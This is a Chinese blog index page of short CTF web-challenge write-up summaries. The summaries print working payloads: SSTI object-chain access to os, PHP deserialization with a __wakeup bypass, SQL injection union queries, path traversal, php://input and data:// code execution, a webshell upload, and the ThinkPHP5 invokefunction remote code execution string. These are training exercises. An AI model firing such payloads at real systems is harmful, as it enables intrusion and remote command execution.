摘要: 1.判断存在python模块注入 {{7+7}} 2.{{''.__class__.__mro__[2].__subclasses__()}} 3.{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].li 阅读全文
posted @ 2020-03-12 17:56 joker0xxx3 阅读(899) 评论(0) 推荐(0) 编辑
摘要: 1.前端检查文件类型,通过修改前端代码或者抓包改后缀,进行上传一句话木马 2.菜刀连接一句话,找到flag 阅读全文
posted @ 2020-03-12 17:26 joker0xxx3 阅读(458) 评论(0) 推荐(0) 编辑
摘要: 1.代码审计,需要构造序列化对象,o表示对象 a表示数组 s表示字符 i表示数字 其后数字表示个数,并且需要绕过__wakeup()函数,对象个数大于实际对象个数就会跳过wakeup ?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";} 2.也可以构造的序列化flag 阅读全文
posted @ 2020-03-12 17:05 joker0xxx3 阅读(182) 评论(0) 推荐(0) 编辑
摘要: 1.查看index.phps文件 2.构造get参数,当传入参数id时,浏览器在后面会对非ASCII码的字符进行一次urlencode,然后在这段代码中运行时,会自动进行一次urldecode,在urldecode()函数中,再一次进行一次解码 ?id=%2561dmin 阅读全文
posted @ 2020-03-12 16:32 joker0xxx3 阅读(143) 评论(0) 推荐(0) 编辑
摘要: 1.下载附件,查看源码,全是乱码 2.审计代码可以看到最开始的下划线“_”是一个变量,其内容是一个函数的代码,而最后又是一个eval(_),也就是执行这个函数了,把eval改为alert,让程序弹框,得到了源码的非乱码形式: 3.整理得到 4.满足if条件即可输出flag be0f233ac7be9 阅读全文
posted @ 2020-03-12 15:48 joker0xxx3 阅读(292) 评论(0) 推荐(0) 编辑
摘要: 1.单引号判断页面报错,加上注释符页面正常,判定sql注入接下来手工注入即可 2.用order by判断有三个字段数,爆出位置 -1' union select 1,2,3# 3.暴出表名 -1' union select 1,2,group_concat(table_name) from info 阅读全文
posted @ 2020-03-12 15:18 joker0xxx3 阅读(321) 评论(0) 推荐(0) 编辑
摘要: 1.f12查看源代码,有提示 2.审计代码 3.提到hint.php,查看页面 4.构造payload,四层目录 http://111.198.29.45:35206/source.php?file=hint.php?./../../../../ffffllllaaaagggg 阅读全文
posted @ 2020-03-12 15:05 joker0xxx3 阅读(957) 评论(0) 推荐(0) 编辑
摘要: 方法一: 1.尝试构造,index.php?page=PHP://input post:<?php system("ls");?> 2.得到 3.查看fl4gisisish3r3.php文件 方法二: Payload:index.php?page=data:text/plain,<?php syst 阅读全文
posted @ 2020-03-12 14:13 joker0xxx3 阅读(536) 评论(0) 推荐(0) 编辑
摘要: 1.thinkphp5 rce漏洞,构造payload, ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27 阅读全文
posted @ 2020-03-12 13:47 joker0xxx3 阅读(2683) 评论(1) 推荐(0) 编辑
摘要: 1.查看robots.txt页面 2.查看fl0g.php页面 阅读全文
posted @ 2020-03-12 13:31 joker0xxx3 阅读(272) 评论(0) 推荐(0) 编辑